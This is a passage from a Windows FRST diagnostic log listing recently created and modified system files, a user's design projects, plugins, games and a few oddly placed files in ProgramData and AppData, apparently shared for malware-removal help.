C:\Windows\SysWOW64\spacebridge.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 000165376 _____ (Microsoft Corporation) C:\Windows\system32\CompPkgSrv.exe 2019-06-12 12:03 - 2019-06-12 12:03 - 000162304 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.StateRepositoryUpgrade.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 000156984 _____ (Microsoft Corporation) C:\Windows\system32\Windows.StateRepositoryClient.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 000155136 _____ (Microsoft Corporation) C:\Windows\system32\Chakradiag.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 000152896 _____ (Microsoft Corporation) C:\Windows\system32\userenv.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 000152400 _____ (Microsoft Corporation) C:\Windows\system32\KerbClientShared.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 000137056 _____ (Microsoft Corporation) C:\Windows\SysWOW64\userenv.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 000125528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KerbClientShared.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 000122680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.StateRepositoryClient.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 000114648 _____ (Microsoft Corporation) C:\Windows\system32\CompPkgSup.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 000111104 _____ (Microsoft Corporation) C:\Windows\system32\AxInstSv.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 000108544 _____ (Microsoft Corporation) C:\Windows\system32\usoapi.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 000101176 _____ (Microsoft Corporation) C:\Windows\system32\Windows.StateRepositoryBroker.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 000097792 _____ (Microsoft Corporation) C:\Windows\system32\BingFilterDS.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 000091424 _____ (Microsoft Corporation) C:\Windows\SysWOW64\CompPkgSup.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 000090624 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\Microsoft.Bluetooth.Legacy.LEEnumerator.sys 2019-06-12 12:03 - 2019-06-12 12:03 - 000090424 _____ (Microsoft Corporation) C:\Windows\system32\hvloader.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 000087864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.StateRepositoryBroker.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 000080400 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\hvservice.sys 2019-06-12 12:03 - 2019-06-12 12:03 - 000076288 _____ (Microsoft Corporation) C:\Windows\system32\WaaSMedicAgent.exe 2019-06-12 12:03 - 2019-06-12 12:03 - 000070144 _____ (Microsoft Corporation) C:\Windows\SysWOW64\usoapi.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 000069120 _____ (Microsoft Corporation) C:\Windows\system32\wups.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 000068096 _____ (Microsoft Corporation) C:\Windows\system32\TokenBrokerUI.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 000060928 _____ (Microsoft Corporation) C:\Windows\system32\mf3216.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 000060416 _____ (Microsoft Corporation) C:\Windows\system32\AssignedAccessRuntime.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 000051712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TokenBrokerUI.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 000048128 _____ (Microsoft Corporation) C:\Windows\system32\UsoClient.exe 2019-06-12 12:03 - 2019-06-12 12:03 - 000047104 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AssignedAccessRuntime.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 000046080 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mf3216.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 000041472 _____ (Microsoft Corporation) C:\Windows\system32\Windows.StateRepositoryCore.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 000035840 _____ (Microsoft Corporation) C:\Windows\system32\wups2.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 000031744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.StateRepositoryCore.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 000031232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wups.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 000022528 _____ (Microsoft Corporation) C:\Windows\system32\slcext.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 000019968 _____ (Microsoft Corporation) C:\Windows\SysWOW64\slcext.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 000002560 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tzres.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 000002560 _____ (Microsoft Corporation) C:\Windows\system32\tzres.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 000000315 _____ C:\Windows\system32\DrtmAuth8.bin 2019-06-12 12:03 - 2019-06-12 12:03 - 000000315 _____ C:\Windows\system32\DrtmAuth7.bin 2019-06-12 12:03 - 2019-06-12 12:03 - 000000315 _____ C:\Windows\system32\DrtmAuth6.bin 2019-06-12 12:03 - 2019-06-12 12:03 - 000000315 _____ C:\Windows\system32\DrtmAuth5.bin 2019-06-12 12:03 - 2019-06-12 12:03 - 000000315 _____ C:\Windows\system32\DrtmAuth4.bin 2019-06-12 12:03 - 2019-06-12 12:03 - 000000315 _____ C:\Windows\system32\DrtmAuth3.bin 2019-06-12 12:03 - 2019-06-12 12:03 - 000000315 _____ C:\Windows\system32\DrtmAuth2.bin 2019-06-12 12:03 - 2019-06-12 12:03 - 000000315 _____ C:\Windows\system32\DrtmAuth1.bin 2019-06-11 17:05 - 2019-06-11 17:05 - 000001663 _____ C:\Users\Bach\Desktop\Cuphead.lnk 2019-06-11 13:26 - 2019-06-11 13:26 - 000000000 ____D C:\Users\Bach\AppData\Local\Tempzxpsign9ce989e932ddc680 2019-06-11 13:26 - 2019-06-11 13:26 - 000000000 ____D C:\Users\Bach\AppData\Local\Tempzxpsign7dcfcfce9ace640d 2019-06-11 13:26 - 2019-06-11 13:26 - 000000000 ____D C:\Users\Bach\AppData\Local\Tempzxpsign431327ba95d92f13 2019-06-10 15:53 - 2019-06-10 16:01 - 000000000 ____D C:\Users\Bach\Desktop\Noguchi 2019-06-10 13:32 - 2019-06-11 13:35 - 105683112 _____ C:\Users\Bach\Desktop\siyahbaskı.psd 2019-06-10 13:32 - 2019-06-10 13:32 - 000000000 ____D C:\Users\Bach\AppData\Local\Tempzxpsign8b3bd3698457695f 2019-06-10 13:19 - 2019-06-10 13:19 - 000000000 ____D C:\Users\Bach\AppData\Local\Tempzxpsigncd66b27b403dd66a 2019-06-10 13:19 - 2019-06-10 13:19 - 000000000 ____D C:\Users\Bach\AppData\Local\Tempzxpsign4c43a551698a38c5 2019-06-10 13:19 - 2019-06-10 13:19 - 000000000 ____D C:\Users\Bach\AppData\Local\Tempzxpsign26f9346638932128 2019-06-09 15:12 - 2019-06-09 15:31 - 001715047 _____ C:\Users\Bach\Desktop\bazalt deneme.skp 2019-06-09 12:56 - 2019-06-20 18:18 - 001957799 _____ C:\Users\Bach\Desktop\bunu dene bakalım.skp 2019-06-08 17:02 - 2019-06-08 17:11 - 000708606 _____ C:\Users\Bach\Desktop\echo wall.skp 2019-06-08 16:12 - 2019-06-08 16:12 - 000147023 _____ C:\Users\Bach\Downloads\DBUR_DimTools_v1.0.0_4.rbz 2019-06-08 16:10 - 2019-06-08 16:10 - 010142689 _____ C:\Users\Bach\Downloads\cmv0.40004_0.rbz 2019-06-08 16:09 - 2019-06-08 16:09 - 000306805 _____ C:\Users\Bach\Downloads\as_shapestoolbar_1-2.rbz 2019-06-08 16:08 - 2019-06-08 16:08 - 000009800 _____ C:\Users\Bach\Downloads\ene_uprightExtruder_v1.2.1.rbz 2019-06-08 16:07 - 2019-06-08 16:07 - 000006897 _____ C:\Users\Bach\Downloads\as_flatten_2-4_1.rbz 2019-06-08 16:06 - 2019-06-08 16:06 - 000206381 _____ C:\Users\Bach\Downloads\Fredo6_FredoScale - v2.8a - 08 Nov 15.rbz 2019-06-08 16:02 - 2019-06-08 16:02 - 000002878 _____ C:\Users\Bach\Downloads\ene_fractalTerrain_v1.1.0_0.rbz 2019-06-08 16:01 - 2019-06-08 16:01 - 000002957 _____ C:\Users\Bach\Downloads\clf_select_same_length_edges_1-2-1_0.rbz 2019-06-08 16:00 - 2019-06-08 16:00 - 000011033 _____ C:\Users\Bach\Downloads\ene_3dRotate_v1.0.6.rbz 2019-06-08 15:55 - 2019-06-08 15:55 - 000010175 _____ C:\Users\Bach\Downloads\su_shapes-2.0.1.rbz 2019-06-05 19:40 - 2019-06-05 19:42 - 000000000 ____D C:\Users\Bach\Downloads\spelunky-1.1 2019-06-05 19:39 - 2019-06-05 19:40 - 010012564 _____ C:\Users\Bach\Downloads\spelunky-1.1.zip 2019-06-05 18:23 - 2019-06-05 18:24 - 000000000 ____D C:\Users\Bach\Desktop\tez eski 2019-06-05 11:48 - 2019-06-05 11:48 - 005685772 _____ C:\Users\Bach\Desktop\GRANİTE - invatech_price.pdf 2019-06-02 20:43 - 2019-06-02 20:43 - 000000022 _____ C:\Users\Bach\AppData\Local\x-plane_install_11.txt 2019-06-02 20:39 - 2019-06-02 20:39 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\X-Plane 11 2019-06-02 16:12 - 2019-06-02 16:13 - 068552860 _____ C:\Users\Bach\Desktop\olabilir.dwg 2019-06-02 11:45 - 2019-06-02 11:45 - 000038179 _____ C:\Users\Bach\Desktop\Untitled.3dm 2019-06-01 18:42 - 2019-06-01 18:42 - 000000000 ____D C:\Users\Bach\AppData\Roaming\Cuphead 2019-06-01 18:42 - 2019-06-01 18:42 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Cuphead [GOG.com] 2019-06-01 18:42 - 2019-06-01 18:42 - 000000000 ____D C:\ProgramData\GOG.com 2019-06-01 18:39 - 2019-06-01 18:39 - 000000000 ____D C:\GOG Games 2019-05-31 18:31 - 2019-05-31 18:31 - 002978000 _____ C:\Users\Bach\Desktop\konik döndür.dwg 2019-05-30 16:02 - 2019-05-30 16:02 - 000271239 _____ C:\Windows\SysWOW64\tmp 2019-05-30 13:09 - 2019-05-30 14:09 - 000000000 ____D C:\Users\Bach\Desktop\Sanayi Planlar 2019-05-29 14:04 - 2019-05-29 14:04 - 000000000 ____D C:\Users\Bach\AppData\Local\Tempzxpsignd7fbd099789c15cb 2019-05-29 13:45 - 2019-05-29 13:45 - 000000000 ____D C:\Users\Bach\AppData\Local\Tempzxpsignd9f30b806f63e57b 2019-05-29 13:45 - 2019-05-29 13:45 - 000000000 ____D C:\Users\Bach\AppData\Local\Tempzxpsign27ced1b424516e6e 2019-05-29 13:40 - 2019-05-29 13:40 - 000000000 ____D C:\Users\Bach\AppData\Local\Tempzxpsign4a90cde478cfc4ac 2019-05-29 13:26 - 2019-05-29 13:26 - 000000000 ____D C:\Users\Bach\AppData\Local\Tempzxpsign61ebf40d4bdff661 2019-05-29 12:27 - 2019-05-29 12:27 - 000000000 ____D C:\Users\Bach\AppData\Local\Tempzxpsign77b0edd5273628f5 2019-05-29 12:16 - 2019-05-29 12:16 - 000000000 ____D C:\Users\Bach\AppData\Local\Tempzxpsign7d33bf127abd265c 2019-05-29 12:16 - 2019-05-29 12:16 - 000000000 ____D C:\Users\Bach\AppData\Local\Tempzxpsign0c30808d3b149f68 2019-05-29 12:14 - 2019-05-29 12:14 - 000000000 ____D C:\Users\Bach\AppData\Local\Tempzxpsignbbc5a690d41245df 2019-05-29 12:12 - 2019-05-29 12:12 - 000000000 ____D C:\Users\Bach\AppData\Local\Tempzxpsigneca3764c64284c1d 2019-05-29 12:08 - 2019-05-29 12:08 - 000000000 ____D C:\Users\Bach\AppData\Local\Tempzxpsign9bc12a5bdd4e3597 2019-05-29 12:04 - 2019-05-29 12:04 - 000000000 ____D C:\Users\Bach\AppData\Local\Tempzxpsignf1dc0726685d1b6c 2019-05-29 12:03 - 2019-05-29 12:03 - 000000000 ____D C:\Users\Bach\AppData\Local\Tempzxpsign3dec99847489c12f 2019-05-29 12:01 - 2019-05-29 12:01 - 000000000 ____D C:\Users\Bach\AppData\Local\Tempzxpsign01b8340f65501cc3 2019-05-29 11:53 - 2019-05-29 11:53 - 000000000 ____D C:\Users\Bach\AppData\Local\Tempzxpsign7c7b568405bbb7c6 2019-05-29 11:51 - 2019-05-29 11:51 - 000000000 ____D C:\Users\Bach\AppData\Local\Tempzxpsign83dec18a1f3e2d76 2019-05-29 11:51 - 2019-05-29 11:51 - 000000000 ____D C:\Users\Bach\AppData\Local\Tempzxpsign537911fe931d9748 2019-05-28 18:13 - 2019-05-28 18:13 - 010376720 _____ C:\Users\Bach\Desktop\satalata.fbx 2019-05-28 18:06 - 2019-06-14 00:17 - 006194428 _____ C:\Users\Bach\Desktop\reflected.3dm 2019-05-28 18:06 - 2019-05-28 18:06 - 006094633 _____ C:\Users\Bach\Desktop\reflected.3dmbak 2019-05-28 17:44 - 2019-05-28 17:51 - 013122883 _____ C:\Users\Bach\Desktop\reflection satalite.3dm 2019-05-28 17:44 - 2019-05-28 17:44 - 013346782 _____ C:\Users\Bach\Desktop\reflection satalite.3dmbak 2019-05-28 14:32 - 2019-05-28 14:32 - 000000000 ____D C:\Users\Bach\AppData\LocalLow\Temp 2019-05-28 03:05 - 2019-05-28 03:05 - 002156005 _____ C:\Users\Bach\Desktop\parabol denemeler.3dm 2019-05-27 19:05 - 2019-05-28 03:06 - 000000000 ____D C:\Users\Bach\AppData\Roaming\Grasshopper ==================== One month (modified) ======== (If an entry is included in the fixlist, the file/folder will be moved.) 2019-06-24 02:56 - 2019-04-24 21:44 - 000000000 ____D C:\FRST 2019-06-24 02:53 - 2019-01-10 22:23 - 001680334 _____ C:\Windows\system32\PerfStringBackup.INI 2019-06-24 02:53 - 2018-09-15 19:23 - 000704294 _____ C:\Windows\system32\perfh01F.dat 2019-06-24 02:53 - 2018-09-15 19:23 - 000144382 _____ C:\Windows\system32\perfc01F.dat 2019-06-24 02:53 - 2018-09-15 10:31 - 000000000 ____D C:\Windows\INF 2019-06-24 02:50 - 2019-04-24 21:13 - 003008142 _____ C:\Windows\ntbtlog.txt 2019-06-24 02:49 - 2019-04-24 21:13 - 000000214 _____ C:\Windows\Tasks\CreateExplorerShellUnelevatedTask.job 2019-06-24 02:48 - 2018-09-15 09:09 - 000524288 _____ C:\Windows\system32\config\BBI 2019-06-24 02:46 - 2018-09-15 10:33 - 000000000 ___HD C:\Windows\ELAMBKUP 2019-06-24 02:41 - 2019-01-10 22:34 - 000000006 ____H C:\Windows\Tasks\SA.DAT 2019-06-24 02:41 - 2019-01-10 22:24 - 000065536 _____ C:\Windows\system32\spu_storage.bin 2019-06-24 02:41 - 2019-01-10 22:21 - 000000000 ____D C:\Users\Bach 2019-06-24 02:40 - 2019-01-29 22:13 - 000000000 ____D C:\Users\Bach\AppData\Roaming\WTablet 2019-06-24 02:40 - 2019-01-12 01:06 - 000003088 _____ C:\Windows\System32\Tasks\AMDLinkUpdate 2019-06-24 02:40 - 2019-01-11 12:38 - 000000000 ____D C:\Program Files (x86)\TeamViewer 2019-06-24 02:40 - 2019-01-10 22:34 - 000000000 ____D C:\Windows\system32\SleepStudy 2019-06-24 02:40 - 2018-09-15 10:33 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft 2019-06-24 01:51 - 2019-01-10 23:29 - 000004194 _____ C:\Windows\System32\Tasks\User_Feed_Synchronization-{2CFA9CCF-1272-4A2D-AC19-A0BFD431E6F6} 2019-06-24 01:19 - 2019-01-11 01:16 - 135349160 ____C (Microsoft Corporation) C:\Windows\system32\MRT.exe 2019-06-24 00:25 - 2019-02-24 17:33 - 000000000 ____D C:\Program Files (x86)\SmartData 2019-06-24 00:25 - 2019-02-24 17:31 - 000000000 ____D C:\Users\Bach\Downloads\Setup_5531 2019-06-23 23:41 - 2019-01-11 01:15 - 000000000 ____D C:\Users\Bach\AppData\Roaming\qBittorrent 2019-06-23 23:41 - 2019-01-10 23:31 - 000000000 ____D C:\Users\Bach\AppData\Local\CrashDumps 2019-06-23 22:46 - 2019-01-10 22:24 - 000000000 ____D C:\Users\Bach\AppData\Local\D3DSCache 2019-06-23 22:37 - 2016-01-26 09:52 - 000000579 _____ C:\Users\Bach\Desktop\Delete_Update_Policies.bat 2019-06-22 18:09 - 2019-01-11 02:21 - 000000000 ____D C:\Users\Bach\Documents\Lumion 8.0 2019-06-21 19:05 - 2019-04-18 18:24 - 000000000 ____D C:\Users\Bach\AppData\Local\Ubisoft Game Launcher 2019-06-21 15:43 - 2019-01-10 23:22 - 000000000 ____D C:\Users\Public\Documents\KeyShot 7 2019-06-21 14:45 - 2018-09-15 10:33 - 000000000 ___HD C:\Program Files\WindowsApps 2019-06-21 14:45 - 2018-09-15 10:33 - 000000000 ____D C:\Windows\AppReadiness 2019-06-21 14:21 - 2019-01-10 22:38 - 000000000 ____D C:\ProgramData\Packages 2019-06-21 13:47 - 2019-04-02 10:32 - 000000000 ____D C:\Users\Bach\Desktop\Bahadır kişisel Sergi 2019 2019-06-20 23:33 - 2019-02-18 22:00 - 000000000 ____D C:\Users\Public\Documents\My DAZ 3D Library 2019-06-18 18:05 - 2018-09-15 10:33 - 000000000 ____D C:\Program Files\Common Files\microsoft shared 2019-06-18 18:04 - 2019-01-10 23:39 - 000000000 ____D C:\Program Files\Microsoft Office 2019-06-18 18:02 - 2019-01-10 22:23 - 000003354 _____ C:\Windows\System32\Tasks\OneDrive Standalone Update Task-S-1-5-21-3359497532-2870962415-192448273-1001 2019-06-18 18:02 - 2019-01-10 22:23 - 000000000 ___RD C:\Users\Bach\OneDrive 2019-06-18 18:02 - 2019-01-10 22:21 - 000002368 _____ C:\Users\Bach\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk 2019-06-16 14:15 - 2019-01-11 12:38 - 000001040 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\TeamViewer 14.lnk 2019-06-16 13:27 - 2019-01-10 22:22 - 000000000 ____D C:\Users\Bach\AppData\Local\Packages 2019-06-15 16:13 - 2018-09-15 10:23 - 000000000 ____D C:\Windows\CbsTemp 2019-06-15 16:12 - 2018-09-15 10:33 - 000000000 ____D C:\Windows\SysWOW64\MUI 2019-06-15 16:12 - 2018-09-15 10:33 - 000000000 ____D C:\Windows\system32\MUI 2019-06-13 22:19 - 2018-09-15 10:33 - 000000000 ____D C:\Windows\system32\NDF 2019-06-13 12:08 - 2019-01-10 22:22 - 000000000 __RHD C:\Users\Public\AccountPictures 2019-06-13 12:08 - 2019-01-10 22:22 - 000000000 ___RD C:\Users\Bach\3D Objects 2019-06-13 12:07 - 2019-01-10 22:34 - 000442528 _____ C:\Windows\system32\FNTCACHE.DAT 2019-06-13 03:42 - 2018-09-15 10:33 - 000000000 ___RD C:\Program Files\Windows Defender 2019-06-13 03:42 - 2018-09-15 10:33 - 000000000 ____D C:\Windows\system32\migwiz 2019-06-13 03:42 - 2018-09-15 10:33 - 000000000 ____D C:\Windows\bcastdvr 2019-06-12 15:28 - 2018-09-15 10:33 - 000000000 ____D C:\Windows\LiveKernelReports 2019-06-12 12:01 - 2019-01-11 01:16 - 000000000 ____D C:\Windows\system32\MRT 2019-06-08 17:03 - 2019-04-09 09:19 - 000000000 ____D C:\Users\Bach\Desktop\Kitaplar Pdf 2019-06-08 12:42 - 2019-02-18 20:12 - 000000000 ____D C:\Users\Bach\Desktop\3D baskı denemeleri 2019-06-05 23:14 - 2019-04-18 21:16 - 000000000 ____D C:\Users\Bach\Documents\Assassin's Creed Unity 2019-06-05 21:14 - 2019-01-10 22:23 - 000000000 ____D C:\Users\Bach\AppData\Local\PlaceholderTileLogoFolder 2019-06-05 19:40 - 2018-09-15 10:41 - 000385536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dpnet.dll 2019-06-05 19:40 - 2018-09-15 10:41 - 000215552 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dplayx.dll 2019-06-05 19:40 - 2018-09-15 10:41 - 000061440 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dpnathlp.dll 2019-06-05 19:40 - 2018-09-15 10:41 - 000045568 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dpwsockx.dll 2019-06-05 19:40 - 2018-09-15 10:41 - 000023552 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dpmodemx.dll 2019-06-05 19:40 - 2018-09-15 10:41 - 000022528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dpnsvr.exe 2019-06-05 19:40 - 2018-09-15 10:41 - 000020480 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dplaysvr.exe 2019-06-05 19:40 - 2018-09-15 10:41 - 000008192 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dpnhupnp.dll 2019-06-05 19:40 - 2018-09-15 10:41 - 000008192 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dpnhpast.dll 2019-06-05 19:40 - 2018-09-15 10:41 - 000005120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dpnlobby.dll 2019-06-05 19:40 - 2018-09-15 10:41 - 000005120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dpnaddr.dll 2019-06-05 19:40 - 2018-09-15 10:37 - 000472576 _____ (Microsoft Corporation) C:\Windows\system32\dpnet.dll 2019-06-05 19:40 - 2018-09-15 10:37 - 000067584 _____ (Microsoft Corporation) C:\Windows\system32\dpnathlp.dll 2019-06-05 19:40 - 2018-09-15 10:37 - 000027136 _____ (Microsoft Corporation) C:\Windows\system32\dpnsvr.exe 2019-06-05 19:40 - 2018-09-15 10:37 - 000010240 _____ (Microsoft Corporation) C:\Windows\system32\dpnhupnp.dll 2019-06-05 19:40 - 2018-09-15 10:37 - 000010240 _____ (Microsoft Corporation) C:\Windows\system32\dpnhpast.dll 2019-06-05 19:40 - 2018-09-15 10:37 - 000006144 _____ (Microsoft Corporation) C:\Windows\system32\dpnlobby.dll 2019-06-05 19:40 - 2018-09-15 10:37 - 000006144 _____ (Microsoft Corporation) C:\Windows\system32\dpnaddr.dll 2019-06-01 17:53 - 2019-04-09 12:27 - 000000000 ____D C:\Users\Bach\Desktop\Sergiler 2019 2019-06-01 17:47 - 2019-04-30 13:09 - 000000000 ____D C:\Users\Bach\Desktop\Turn around 2019-05-31 21:03 - 2018-09-15 10:36 - 000835688 _____ (Adobe) C:\Windows\SysWOW64\FlashPlayerApp.exe 2019-05-31 21:03 - 2018-09-15 10:36 - 000179816 _____ (Adobe) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl 2019-05-31 13:32 - 2019-01-10 23:23 - 000000000 ____D C:\Users\Bach\AppData\Local\Luxion ==================== Files in the root of some directories ================ 2019-02-26 10:00 - 2019-04-24 21:11 - 000000004 _____ () C:\ProgramData\lock.dat 2019-06-21 18:58 - 2019-06-21 18:58 - 000137168 _____ (Mozilla Foundation) C:\ProgramData\mozglue.dll 2019-06-21 18:58 - 2019-06-21 18:58 - 001246160 _____ (Mozilla Foundation) C:\ProgramData\nss3.dll 2019-02-26 10:00 - 2019-02-26 10:00 - 000000008 _____ () C:\ProgramData\ts.dat 2019-02-17 18:28 - 2019-02-24 22:05 - 000000112 _____ () C:\Users\Bach\AppData\Roaming\JP2K CS6 Prefs 2019-02-24 19:23 - 2019-03-18 19:26 - 006387208 _____ () C:\Users\Bach\AppData\Local\dump007.dat 1601-01-03 21:26 - 1601-01-03 21:26 - 000078336 ____N (Microsoft Corporation) C:\Users\Bach\AppData\Local\ONUNgrImIAlyO.exe 2019-04-21 20:00 - 2019-04-21 20:00 - 000000000 _____ () C:\Users\Bach\AppData\Local\oobelibMkey.log 2019-01-10 22:28 - 2019-04-24 21:08 - 000007628 _____ () C:\Users\Bach\AppData\Local\Resmon.ResmonCfg 2019-06-21 18:58 - 2019-06-21 18:58 - 000722944 _____ () C:\Users\Bach\AppData\Local\sha.db 2019-02-24 17:33 - 2019-02-24 17:33 - 000000003 _____ () C:\Users\Bach\AppData\Local\wbem.ini 2019-06-02 20:43 - 2019-06-02 20:43 - 000000022 _____ () C:\Users\Bach\AppData\Local\x-plane_install_11.txt ==================== FLock ================ 2019-01-10 22:17 C:\Windows\CSC ==================== SigCheck =============================== (There is no automatic fix for files that do not pass verification.) ==================== End of FRST.txt ============================